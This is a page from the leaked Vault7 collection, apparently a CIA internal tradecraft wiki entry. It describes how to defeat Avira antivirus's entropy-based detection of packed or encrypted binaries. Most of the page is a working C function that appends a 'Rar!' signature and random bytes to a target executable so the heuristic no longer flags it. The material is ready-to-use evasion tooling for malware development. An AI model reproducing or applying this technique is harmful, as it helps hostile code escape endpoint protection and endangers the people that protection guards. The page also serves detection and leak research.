Vault7: CIA Hacking Tools Revealed
Navigation: » Directory » AED Development Tradecraft » AED Development Tradecraft Home » Specific Tradecraft Techniques » Detecting and Bypassing Personal Security Products (PSPs)
Owner: User #71473
Avira Entropy Defeat
Avira has an entropy-based heuristic that will flag binaries that contain large sections of compressed/encrypted data. Experimentation leads us to believe that this detection is proportional and will detect files that have ~5% or more high entropy data.
Padding the file to reduce this proportion defeats the technique but is not ideal. Fortunately, we can achieve the same affect by adding a RARFile compression algorithm signature with a few bytes of data to the binary in an arbitrary location. For simplicity’s sake, appending to the end seems to do the trick.
BOOL AddAviraDefeat(LPCTSTR szTargetFile)
{
HCRYPTPROV hCryptProv;
BYTE pbData[28];
DWORD dwWritten, dwRead;
CHAR rarBuffer[32] = "Rar!";
CHAR tmpBuffer[32] = {0};
// check for existing defeat
HANDLE hFile = CreateFile(szTargetFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
SetFilePointer(hFile, -32, NULL, FILE_END);
if (!ReadFile(hFile, tmpBuffer, 32, &dwRead, NULL) || dwRead != 32)
{
printf("WARNING: Couldn't read file to check for existing Avira defeat. You should manually check for the defeat at the end of the file and add if necessary -- see AviraDefeat folder on User #?'s share.\n");
CloseHandle(hFile);
return FALSE;
};
CloseHandle(hFile);
tmpBuffer[4] = '\0';
if (stricmp(tmpBuffer, "RAR!") == 0)
{
printf("Avira defeat already exists.");
return TRUE;
}
}
if (!CryptAcquireContext(&hCryptProv, 0, 0, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT | CRYPT_SILENT))
{
printf("WARNING: Couldn't get crypto context for random data for Avira defeat. You should manually add the defeat -- see AviraDefeat folder on User #?'s share.\n");
return FALSE;
}
if(!CryptGenRandom(hCryptProv, 28, pbData))
{
printf("WARNING: Couldn't generate random data for Avira defeat. You should manually add the defeat -- see AviraDefeat folder on User #?'s share.\n");
CryptReleaseContext(hCryptProv, 0);
return FALSE;
}
CryptReleaseContext(hCryptProv, 0);
memcpy(rarBuffer + 4, pbData, 28);
hFile = CreateFile(szTargetFile, GENERIC_READ|FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
if (!WriteFile(hFile, rarBuffer, 32, &dwWritten, NULL) || dwWritten != 32)
{
printf("WARNING: Couldn't add Avira defeat. You should manually add the defeat -- see AviraDefeat folder on User #?'s share.\n");
CloseHandle(hFile);
return FALSE;
}
}
CloseHandle(hFile);
return TRUE;
}